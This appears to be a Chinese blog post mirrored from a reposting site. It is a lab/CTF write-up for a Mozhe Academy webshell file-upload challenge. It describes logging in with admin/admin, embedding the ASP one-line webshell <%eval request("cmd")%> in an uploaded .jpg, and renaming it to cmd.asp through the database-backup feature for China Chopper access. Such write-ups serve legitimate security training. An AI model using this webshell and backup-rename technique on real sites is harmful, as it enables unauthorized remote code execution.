美文网首页
墨者学院-WebShell文件上传漏洞分析溯源(第5题)

墨者学院-WebShell文件上传漏洞分析溯源(第5题)

作者: nohands_noob | 来源:发表于2019-07-18 13:24 被阅读0次

靶场地址:
https://www.mozhe.cn/bug/detail/OGp3KzRZUFpnVUNUZm9xcjJlN1V4dz09bW96aGUmozhe

后台登录页面路径/admin/login.asp,尝试弱口令登录,admin/admin成功登录


点击文件管理-管理文章-随机选择一篇编辑,写入asp一句话木马<%eval request("cmd")%>,保存文件后缀为jpg,上传,记录上传路径

点击数据处理-数据备份,通过数据库备份来写入一句话木马,备份我们的图片,备份数据库名称为cmd.asp



接着上菜刀找key即可


相关文章

网友评论

      本文标题:墨者学院-WebShell文件上传漏洞分析溯源(第5题)

      本文链接:https://www.haomeiwen.com/subject/nxfllctx.html